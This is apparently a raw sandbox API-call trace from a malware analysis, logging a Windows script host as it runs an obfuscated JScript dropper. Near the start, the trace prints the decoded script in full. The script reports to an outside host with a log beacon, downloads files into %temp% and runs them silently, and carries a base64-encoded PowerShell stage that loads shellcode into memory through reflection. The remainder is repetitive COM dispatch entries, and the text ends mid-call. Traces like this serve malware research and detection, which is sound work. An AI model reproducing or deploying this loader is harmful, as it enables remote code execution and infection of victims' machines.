I$n`qTNN45piwA\"fA~KjBA`xo2\x7fC[\\dFIs}LAFp`ear`s5K+3\"]`.G}^G69y]TU.AB[AF9py4Xpi9\\5k%..`sA}MG\\tM#\"5!!W}:\\54_tFNyt~p#ja#^NHS825:F]#gMYo}`sVjoe7Is9x9Fs~py2nU3BA5js\"\\2IA]3wAKG)TlZ.~p#}hJ8I4}.]vtMa;tytt[N}jH8om.hI\\j2!l?\x09oCj:*y}ssT\"jw;i!w&4`[BI0smIT%-t_3q1_]sU3Bj\\xtUi`N$IN#0.\"49\"jsV.ZA&:M[A\"jo$5K}}t!aAp`Bi.s,.Hi93]0s$IsHvtk0Xtj.}6:s9jG4qNi\"Z5jsxNN]W\\LVh` 1T\"3.x\\j^A\x7fq1]j`V`j+IhC29fjj$qIjo$`js$}^s5\x7fj#~roz\\dF.5S8[wts#9Uy4%\"s9\"nsA\\H8##.b%7.z%\"#`F5\x7fj#A}s)-dF.}6:s9jG4qpi\"M5jsAjVBx}soD`?OqmFoXH3X&HotFNyt~p#}t[\x091U}o4153o$5.}de2W-Hq]INh9I53s~p^[;q.^hnX0-dF.56KwfIse-I^I\x09+os$}Z}fpUO91.o$5jsu8.I5.j4x.%w2Us9Nj:4A5joAg3HoU3s~}!\"cpos6lV9+rj%-6js\x09NN4\x7f`2]/5js}6:s9jG4qmT\"Z5jsVpZXWIxG*dX0X`?,W#y~1I`o$.NpHIU}}\\H%-H`HrmMBigX%-6j2-+wt~KijA5\x7ftNpN$\x7fqKBM9V)\"dX%Z82I6?:o!+A}A?o9%CAs$p`oA\x7f", pstrItemName="window", punkContext=0x0, pstrDelimiter="", dwSourceContextCookie=0x0, ulStartingLineNumber=0x0, dwFlags=0x82, pvarResult=0x18c8e0, pexcepinfo=0x18c900 | out: pvarResult=0x18c8e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2cc538, varVal2=0x368029df40000000), pexcepinfo=0x18c900) returned 0x0 [0038.616] GetCurrentThreadId () returned 0xa40 [0038.619] _wcsicmp (_String1="", _String2="") returned 0 [0038.620] SysStringLen (param_1="function log(l){try{x=new ActiveXObject(\"Msxml2.ServerXMLHTTP.6.0\");x.open(\"GET\",\"http://faebd7.com/log?log=\"+l,false);x.send();return 1;}catch(e){return 0;}}e=123;a=new ActiveXObject(\"WScript.Shell\");while(e!=42){try{w=a.ExpandEnvironmentStrings(\"%windir%\");p=w+\"\\\\syswow64\\\\windowspowershell\\\\v1.0\\\\powershell.exe\";f=new ActiveXObject(\"Scripting.FileSystemObject\");function cdn(){try{return a.RegRead(\"HKLM\\\\software\\\\microsoft\\\\net framework setup\\\\ndp\\\\v2.0.50727\\\\sp\");}catch(e){return 0;}}function d(u){x=new ActiveXObject(\"Msxml2.ServerXMLHTTP.6.0\");x.open(\"GET\",u,false);x.send();ufn=a.ExpandEnvironmentStrings(\"%temp%\\\\\")+u.substring(u.lastIndexOf(\"/\")+1);ufnt=ufn+\".tmp\";uft=f.CreateTextFile(ufnt,true,-1);if(uft){uft.Write(x.responseBody);uft.Close();uf=f.CreateTextFile(ufn,true);uft=f.GetFile(ufnt);ufs=uft.OpenAsTextStream();ufs.Read(2);uf.Write(ufs.Read(uft.Size-2));ufs.Close();uf.Close();f.DeleteFile(ufnt);a.Run(\"\\\"\"+ufn+\"\\\" /quiet /norestart\",0,1);f.DeleteFile(ufn);}}while(!f.FileExists(p)){if(cdn()==0){d(\"\");}d(\"\");}(a.Environment(\"Process\"))(\"a\")=\"iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('ZnVuY3Rpb24gZ2R7UGFyYW0gKFtQYXJhbWV0ZXIoUG9zaXRpb249MCxNYW5kYXRvcnk9JFRydWUpXSBbVHlwZVtdXSAkUGFyYW1ldGVycyxbUGFyYW1ldGVyKFBvc2l0aW9uPTEpXSBbVHlwZV0gJFJldHVyblR5cGU9W1ZvaWRdKTskVHlwZUJ1aWxkZXI9W0FwcERvbWFpbl06OkN1cnJlbnREb21haW4uRGVmaW5lRHluYW1pY0Fzc2VtYmx5KChOZXctT2JqZWN0IFN5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5TmFtZSgiUmVmbGVjdGVkRGVsZWdhdGUiKSksW1N5c3RlbS5SZWZsZWN0aW9uLkVtaXQuQXNzZW1ibHlCdWlsZGVyQWNjZXNzXTo6UnVuKS5EZWZpbmVEeW5hbWljTW9kdWxlKCJJbk1lbW9yeU1vZHVsZSIsJGZhbHNlKS5EZWZpbmVUeXBlKCJNeURlbGVnYXRlVHlwZSIsIkNsYXNzLFB1YmxpYyxTZWFsZWQsQW5zaUNsYXNzLEF1dG9DbGFzcyIsW1N5c3RlbS5NdWx0aWNhc3REZWxlZ2F0ZV0pOyRUeXBlQnVpbGRlci5EZWZpbmVDb25zdHJ1Y3RvcigiUlRTcGVjaWFsTmFtZSxIaWRlQnlTaWcsUHVibGljIixbU3lzdGVtLlJlZmxlY3Rpb24uQ2FsbGluZ0NvbnZlbnRpb25zXTo6U3RhbmRhcmQsJFBhcmFtZXRlcnMpLlNldEltcGxlbWVudGF0aW9uRmxhZ3MoIlJ1bnRpbWUsTWFuYWdlZCIpOyRUeXBlQnVpbGRlci5EZWZpbmVNZXRob2QoIkludm9rZSIsIlB1YmxpYyxIaWRlQnlTaWcsTmV3U2xvdCxWaXJ0dWFsIiwkUmV0dXJuVHlwZSwkUGFyYW1ldGVycykuU2V0SW1wbGVtZW50YXRpb25GbGFncygiUnVudGltZSxNYW5hZ2VkIik7cmV0dXJuICRUeXBlQnVpbGRlci5DcmVhdGVUeXBlKCk7fWZ1bmN0aW9uIGdhe1BhcmFtIChbUGFyYW1ldGVyKFBvc2l0aW9uPTAsTWFuZGF0b3J5PSRUcnVlKV0gW1N0cmluZ10gJE1vZHVsZSxbUGFyYW1ldGVyKFBvc2l0aW9uPTEsTWFuZGF0b3J5PSRUcnVlKV0gW1N0cmluZ10gJFByb2NlZHVyZSk7JFN5c3RlbUFzc2VtYmx5PVtBcHBEb21haW5dOjpDdXJyZW50RG9tYWluLkdldEFzc2VtYmxpZXMoKXxXaGVyZS1PYmplY3QgeyAkXy5HbG9iYWxBc3NlbWJseUNhY2hlIC1BbmQgJF8uTG9jYXRpb24uU3BsaXQoIlxcIilbLTFdLkVxdWFscygiU3lzdGVtLmRsbCIpfTskVW5zYWZlTmF0aXZlTWV0aG9kcz0kU3lzdGVtQXNzZW1ibHkuR2V0VHlwZSgiTWljcm9zb2Z0LldpbjMyLlVuc2FmZU5hdGl2ZU1ldGhvZHMiKTtyZXR1cm4gJFVuc2FmZU5hdGl2ZU1ldGhvZHMuR2V0TWV0aG9kKCJHZXRQcm9jQWRkcmVzcyIpLkludm9rZSgkbnVsbCxAKFtTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMuSGFuZGxlUmVmXShOZXctT2JqZWN0IFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcy5IYW5kbGVSZWYoKE5ldy1PYmplY3QgSW50UHRyKSwkVW5zYWZlTmF0aXZlTWV0aG9kcy5HZXRNZXRob2QoIkdldE1vZHVsZUhhbmRsZSIpLkludm9rZSgkbnVsbCxAKCRNb2R1bGUpKSkpLCRQcm9jZWR1cmUpKTt9W0J5dGVbXV0gJHA9W0NvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCJWWXZzZyt4b2FtdFlhbVZtaVVXWVdHcHlab2xGbWxocWJtYUpSWnhZYW1WbWlVV2VXR3BzWm9sRm9GaHFNMmFKUmFKWWFqSm1pVVdrV0dvdVpvbEZwbGhxWkdhSlJhaFlhbXhtaVVXcVdHYUpSYXhtaVVXdVpLRXdBQUFBeDBYQVZtbHlkTWRGeEhWaGJFSEhSY2hzYkc5anhrWE1BSXRBREZPRHdBeFd4MFhRVEc5aFpNZEYxRXhwWW5MSFJkaGhjbmxCeGtYY0FNZEZzRWRsZEZESFJiUnliMk5CeDBXNFpHUnlaV2JIUmJ4emM4WkZ2Z0NMeUZlTENXYURlU3dZZFNXTGNUQ05WWmd6L3l2eWpSUitpbFFWbURKVWZaajJ3a0YxQmtlRC93eHk2b1AvREhRNU84aDF6b3RWQ0l0Q1BJdEVFSGlEWmZnQUE4S0xlQ0NMY0J5TFdDU0xRQmdEOGdQYUEvcUpkZWlKWGV5SlJlU0Z3QStFZ2dBQUFPc0xpMUVZNjhtTFhleUxkZWlMUmZpTERJY1B0d1JEaXpTR2cyWDhBQVBLaVUzMGpVWFFBL0lwUmZTTFJmeUxYZlFEMklwRUJkQTZSQjNRZFFuL1JmeURmZndOY3VXRGZmd05kUU9KZGVDSlRmU05UYkF6d0NsTjlJdE45SXBjQmJBRHlEcGNEYkIxQmtDRCtBOXk2NFA0RDNVRGlYWHcvMFg0aTBYNE8wWGtjb1dOUmNCUVV2OVY4SXQxQ0l1ZVFCRUFBSUhHQkJFQUFHcEFhQUF3QUFBRDN2OXpVR29BLzlDSlJmaUZ3QStFRmdFQUFJdExWSU5sOUFDTCtQT2tEN2RMRkkxVUdTQXp5V1k3U3daek00dEtDSXN5Tzg1MkFvdk9oY2wwRll0OUNJdHlESUhIQkJFQUFBUDNpM29FQS9qenBBKzNTd2IvUmZTRHdpZzVUZlJ5ell0d1BBUHdpNDZBQUFBQWczd0JEQUIwU1kxOEFReUxEd1BJVWY5VjRJbEY1SVhBZEN1TFh3UURYZmpySG9zRGhjQjVCUSszd09zSGkwMzRqVVFJQWxEL2RlVC9WZkNKQTRQREJJTTdBSFhkaTBYNGc4Y1VnejhBZGJ1TGpxUUFBQUNKVGVDTGpxQUFBQUNMMkN0ZU5BUElnMlgwQU9zMmkxWGdPVlgwY3pXTlZ2alI2blFpalhrSWlWWHdEN2NYWm9YU2RBeUI0djhQQUFBRDBBTVJBUnFEeHdML1RmQjE1QUYxOUFQT2kzRUVoZloxdzR0SVBJdE1DQ2hxQUdvQi8zVUlBOGovMGVzQ004QmZYbHZKd2hBQVUxVldNL1pYT1RVNGtFQUFkUXYvRldnd1FBQ2pPSkJBQUlzZERERkFBTDA0a0VBQVZmL1RhZzR6MGxuMzhZdjZSM1FaVmYvVE05SnFHVm4zOFl0RUpCU0F3bUdJRkFaR08vZHk1NHRFSkJSZnhnUUdBRjVkVzhJRUFGV0w3TGdBRUFBQTZOZ0pBQUJUVm9zMUJERkFBRmN6Mi85MUVQOTFDUDhWdURCQUFJdjRoZjkwU290RkVJMUlBWW9RUUlUU2Rma3J3UVBIYUFBUUFBQlFqWVVBOFAvL1VQL1dpMFVJSzhjRFJReFEvM1VVVi8vVy8zVU1qWVVBOFAvL1VQOTFDUDhWQURGQUFEUGJnOFFrUSt1a1gxNkx3MXZKd2hBQVZZdnNnZXhNQkFBQVZsY3ovMWRYdmdRQkFBQldqWVcwKy8vL1VQOTFDRmYvRlRneFFBQ0Z3QStJcVFBQUFHbzRqVVhJVjFESFJjUThBQUFBNkNFSkFBQ0R4QXlOaGJ6OS8vOVFWdjhWUERCQUFQOTFDUDhWc0RCQUFGQ05oYno5Ly85US94VzBNRUFBVjQyRnZQMy8vMUNOaGJUNy8vOVEveFZBTUVBQWhjQjBWWTJGdlAzLy80bEYxSTFGeEZESFJjaEFBQUFBeDBYWVJETkFBU") returned 0x7791 [0038.626] IUnknown:AddRef (This=0x3bfc00) returned 0x4 [0038.626] CoGetObjectContext (in: riid=0x7fef3c66350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18c4a8 | out: ppv=0x18c4a8*=0x36ab70) returned 0x0 [0038.626] IUnknown:Release (This=0x36ab70) returned 0x1 [0038.626] CoGetObjectContext (in: riid=0x7fef3c66350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18c4f8 | out: ppv=0x18c4f8*=0x36ab70) returned 0x0 [0038.626] IUnknown:Release (This=0x36ab70) returned 0x1 [0038.626] ISystemDebugEventFire:IsActive (This=0x3a5b40) returned 0x1 [0038.626] CoGetObjectContext (in: riid=0x7fef3c66350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18c498 | out: ppv=0x18c498*=0x36ab70) returned 0x0 [0038.626] IUnknown:Release (This=0x36ab70) returned 0x1 [0038.626] IUnknown:QueryInterface (in: This=0x3971e0, riid=0x7fef3c66370*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x18c188 | out: ppvObject=0x18c188*=0x0) returned 0x80004002 [0038.626] IUnknown:QueryInterface (in: This=0x3971e0, riid=0x7fef3c66518*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x18c100 | out: ppvObject=0x18c100*=0x0) returned 0x80004002 [0038.626] IUnknown:QueryInterface (in: This=0x3971e0, riid=0x7fef3c664f8*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x18c108 | out: ppvObject=0x18c108*=0x3971e0) returned 0x0 [0038.627] GetCurrentThreadId () returned 0xa40 [0038.627] IActiveScriptSite:OnEnterScript (This=0x3bfc00) returned 0x0 [0038.627] IDispatchEx:GetDispId (in: This=0x3971e0, bstrName="e", grfdex=0x10000001, pid=0x18a7a0 | out: pid=0x18a7a0*=-1) returned 0x80020006 [0038.627] IActiveScript:GetScriptDispatch (in: This=0x2cd250, pstrItemName="window", ppdisp=0x18a508 | out: ppdisp=0x18a508*=0x2ce030) returned 0x0 [0038.627] GetCurrentThreadId () returned 0xa40 [0038.627] IUnknown:QueryInterface (in: This=0x2ce030, riid=0x7fef33dde90*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x18a490 | out: ppvObject=0x18a490*=0x2ce030) returned 0x0 [0038.627] IDispatchEx:GetDispId (in: This=0x2ce030, bstrName="e", grfdex=0x10000001, pid=0x18a518 | out: pid=0x18a518*=-1) returned 0x80020006 [0038.627] IUnknown:Release (This=0x2ce030) returned 0x1 [0038.627] IUnknown:Release (This=0x2ce030) returned 0x1 [0038.627] IActiveScript:GetScriptDispatch (in: This=0x2cea40, pstrItemName="window", ppdisp=0x18a508 | out: ppdisp=0x18a508*=0x2cd7c0) returned 0x0 [0038.627] GetCurrentThreadId () returned 0xa40 [0038.627] IUnknown:QueryInterface (in: This=0x2cd7c0, riid=0x7fef33dde90*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x18a490 | out: ppvObject=0x18a490*=0x2cd7c0) returned 0x0 [0038.627] IDispatchEx:GetDispId (in: This=0x2cd7c0, bstrName="e", grfdex=0x10000001, pid=0x18a518 | out: pid=0x18a518*=-1) returned 0x80020006 [0038.627] IUnknown:Release (This=0x2cd7c0) returned 0x1 [0038.627] IUnknown:Release (This=0x2cd7c0) returned 0x1 [0038.628] CoGetObjectContext (in: riid=0x7fef3c66350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18a7b8 | out: ppv=0x18a7b8*=0x36ab70) returned 0x0 [0038.628] IUnknown:Release (This=0x3971e0) returned 0xe [0038.628] MulDiv (nNumber=10, nNumerator=100, nDenominator=38) returned 26 [0038.628] IUnknown:Release (This=0x36ab70) returned 0x1 [0038.628] GetTickCount () returned 0x11afe [0038.628] IDispatchEx:GetDispId (in: This=0x3971e0, bstrName="a", grfdex=0x10000001, pid=0x18a7a0 | out: pid=0x18a7a0*=-1) returned 0x80020006 [0038.628] IActiveScript:GetScriptDispatch (in: This=0x2cd250, pstrItemName="window", ppdisp=0x18a508 | out: ppdisp=0x18a508*=0x2ce030) returned 0x0 [0038.628] GetCurrentThreadId () returned 0xa40 [0038.628] IUnknown:QueryInterface (in: This=0x2ce030, riid=0x7fef33dde90*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x18a490 | out: ppvObject=0x18a490*=0x2ce030) returned 0x0 [0038.629] IDispatchEx:GetDispId (in: This=0x2ce030, bstrName="a", grfdex=0x10000001, pid=0x18a518 | out: pid=0x18a518*=-1) returned 0x80020006 [0038.629] IUnknown:Release (This=0x2ce030) returned 0x1 [0038.629] IUnknown:Release (This=0x2ce030) returned 0x1 [0038.629] IActiveScript:GetScriptDispatch (in: This=0x2cea40, pstrItemName="window", ppdisp=0x18a508 | out: ppdisp=0x18a508*=0x2cd7c0) returned 0x0 [0038.629] GetCurrentThreadId () returned 0xa40 [0038.629] IUnknown:QueryInterface (in: This=0x2cd7c0, riid=0x7fef33dde90*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x18a490 | out: ppvObject=0x18a490*=0x2cd7c0) returned 0x0 [0038.629] IDispatchEx:GetDispId (in: This=0x2cd7c0, bstrName="a", grfdex=0x10000001, pid=0x18a518 | out: pid=0x18a518*=-1) returned 0x80020006 [0038.629] IUnknown:Release (This=0x2cd7c0) returned 0x1 [0038.629] IUnknown:Release (This=0x2cd7c0) returned 0x1 [0038.629] CLSIDFromProgIDEx (in: lpszProgID="WScript.Shell", lpclsid=0x18a530 | out: lpclsid=0x18a530*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8))) returned 0x0 [0038.629] SysStringLen (param_1=0x0) returned 0x0 [0038.629] CoGetClassObject (in: rclsid=0x18a530*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef3c66300*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18a500 | out: ppv=0x18a500*=0x2cff50) returned 0x0 [0038.629] WshShell:IUnknown:QueryInterface (in: This=0x2cff50, riid=0x7fef3c66310*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x18a508 | out: ppvObject=0x18a508*=0x0) returned 0x80004002 [0038.629] WshShell:IClassFactory:CreateInstance (in: This=0x2cff50, pUnkOuter=0x0, riid=0x7fef3c66350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18a4f0 | out: ppvObject=0x18a4f0*=0x2cd8b8) returned 0x0 [0038.629] WshShell:IUnknown:Release (This=0x2cff50) returned 0x0 [0038.629] IUnknown:QueryInterface (in: This=0x2cd8b8, riid=0x7fef3c66320*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x18a4d0 | out: ppvObject=0x18a4d0*=0x0) returned 0x80004002 [0038.629] IUnknown:QueryInterface (in: This=0x2cd8b8, riid=0x7fef3c66370*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x18a4a8 | out: ppvObject=0x18a4a8*=0x0) returned 0x80004002 [0038.629] IUnknown:QueryInterface (in: This=0x2cd8b8, riid=0x7fef3c66518*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x18a420 | out: ppvObject=0x18a420*=0x0) returned 0x80004002 [0038.629] IUnknown:QueryInterface (in: This=0x2cd8b8, riid=0x7fef3c664f8*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x18a428 | out: ppvObject=0x18a428*=0x0) returned 0x80004002 [0038.629] IUnknown:QueryInterface (in: This=0x2cd8b8, riid=0x7fef3c66508*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x18a430 | out: ppvObject=0x18a430*=0x0) returned 0x80004002 [0038.629] IUnknown:QueryInterface (in: This=0x2cd8b8, riid=0x7fef3c66340*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18a438 | out: ppvObject=0x18a438*=0x2cd890) returned 0x0 [0038.630] IUnknown:Release (This=0x2cd8b8) returned 0x1 [0038.630] IDispatchEx:GetDispId (in: This=0x3971e0, bstrName="w", grfdex=0x10000001, pid=0x18a7a0 | out: pid=0x18a7a0*=-1) returned 0x80020006 [0038.630] IActiveScript:GetScriptDispatch (in: This=0x2cd250, pstrItemName="window", ppdisp=0x18a508 | out: ppdisp=0x18a508*=0x2ce030) returned 0x0 [0038.630] GetCurrentThreadId () returned 0xa40 [0038.630] IUnknown:QueryInterface (in: This=0x2ce030, riid=0x7fef33dde90*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x18a490 | out: ppvObject=0x18a490*=0x2ce030) returned 0x0 [0038.630] IDispatchEx:GetDispId (in: This=0x2ce030, bstrName="w", grfdex=0x10000001, pid=0x18a518 | out: pid=0x18a518*=-1) returned 0x80020006 [0038.630] IUnknown:Release (This=0x2ce030) returned 0x1 [0038.630] IUnknown:Release (This=0x2ce030) returned 0x1 [0038.630] IActiveScript:GetScriptDispatch (in: This=0x2cea40, pstrItemName="window", ppdisp=0x18a508 | out: ppdisp=0x18a508*=0x2cd7c0) returned 0x0 [0038.630] GetCurrentThreadId () returned 0xa40 [0038.630] IUnknown:QueryInterface (in: This=0x2cd7c0, riid=0x7fef33dde90*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x18a490 | out: ppvObject=0x18a490*=0x2cd7c0) returned 0x0 [0038.630] IDispatchEx:GetDispId (in: This=0x2cd7c0, bstrName="w", grfdex=0x10000001, pid=0x18a518 | out: pid=0x18a518*=-1) returned 0x80020006 [0038.630] IUnknown:Release (This=0x2cd7c0) returned 0x1 [0038.630] IUnknown:Release (This=0x2cd7c0) returned 0x1 [0038.630] IDispatch:GetIDsOfNames (in: This=0x2cd890, riid=0x7fef3c66360*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x18a7d0*="ExpandEnvironmentStrings", cNames=0x1, lcid=0x409, rgDispId=0x18a680 | out: rgDispId=0x18a680*=1006) returned 0x0 [0038.633] IUnknown:AddRef (This=0x2cd890) returned 0x2 [0038.633] IDispatch:Invoke (in: This=0x2cd890, dispIdMember=1006, riid=0x7fef3c66360*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x18a568*(rgvarg=([0]=0x18a580*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="%windir%", varVal2=0x2cd940)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x18aaa8, pExcepInfo=0x18a510, puArgErr=0x18a504 | out: pDispParams=0x18a568*(rgvarg=([0]=0x18a580*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="%windir%", varVal2=0x2cd940)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x18aaa8*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows", varVal2=0x18a878), pExcepInfo=0x18a510*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x18a504*=0x0) returned 0x0 [0038.633] IUnknown:Release (This=0x2cd890) returned 0x1 [0038.633] IDispatchEx:GetDispId (in: This=0x3971e0, bstrName="p", grfdex=0x10000001, pid=0x18a7a0 | out: pid=0x18a7a0*=-1) returned 0x80020006 [0038.633] IActiveScript:GetScriptDispatch (in: This=0x2cd250, pstrItemName="window", ppdisp=0x18a508 | out: ppdisp=0x18a508*=0x2ce030) returned 0x0 [0038.633] GetCurrentThreadId () returned 0xa40 [0038.633] IUnknown:QueryInterface (in: This=0x2ce030, riid=0x7fef33dde90*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x18a490 | out: ppvObject=0x18a490*=0x2ce030) returned 0x0 [0038.634] IDispatchEx:GetDispId (in: This=0x2ce030, bstrName="p", grfdex=0x10000001, pid=0x18a518 | out: pid=0x18a518*=-1) returned 0x80020006 [0038.634] IUnknown:Release (This=0x2ce030) returned 0x1 [0038.634] IUnknown:Release (This=0x2ce030) returned 0x1 [0038.634] IActiveScript:GetScriptDispatch (in: This=0x2cea40, pstrItemName="window", ppdisp=0x18a508 | out: ppdisp=0x18a508*=0x2cd7c0) returned 0x0 [0038.634] GetCurrentThreadId () returned 0xa40 [0038.634] IUnknown:QueryInterface (in: This=0x2cd7c0, riid=0x7fef33dde90*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x18a490 | out: ppvObject=0x18a490*=0x2cd7c0) returned 0x0 [0038.634] IDispatchEx:GetDispId (in: This=0x2cd7c0, bstrName="p", grfdex=0x10000001, pid=0x18a518 | out: pid=0x18a518*=-1) returned 0x80020006 [0038.634] IUnknown:Release (This=0x2cd7c0) returned 0x1 [0038.634] IUnknown:Release (This=0x2cd7c0) returned 0x1 [0038.634] IDispatchEx:GetDispId (in: This=0x3971e0, bstrName="f", grfdex=0x10000001, pid=0x18a7a0 | out: pid=0x18a7a0*=-1) returned 0x80020006 [0038.634] IActiveScript:GetScriptDispatch (in: This=0x2cd250, pstrItemName="window", ppdisp=0x18a508 | out: ppdisp=0x18a508*=0x2ce030) returned 0x0 [0038.634] GetCurrentThreadId () returned 0xa40 [0038.634] IUnknown:QueryInterface (in: This=0x2ce030, riid=0x7fef33dde90*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x18a490 | out: ppvObject=0x18a490*=0x2ce030) returned 0x0 [0038.634] IDispatchEx:GetDispId (in: This=0x2ce030, bstrName="f", grfdex=0x10000001, pid=0x18a518 | out: pid=0x18a518*=-1) returned 0x80020006 [0038.634] IUnknown:Release (This=0x2ce030) returned 0x1 [0038.634] IUnknown:Release (This=0x2ce030) returned 0x1 [0038.635] IActiveScript:GetScriptDispatch (in: This=0x2cea40, pstrItemName="window", ppdisp=0x18a508 | out: ppdisp=0x18a508*=0x2cd7c0) returned 0x0 [0038.635] GetCurrentThreadId () returned 0xa40 [0038.635] IUnknown:QueryInterface (in: 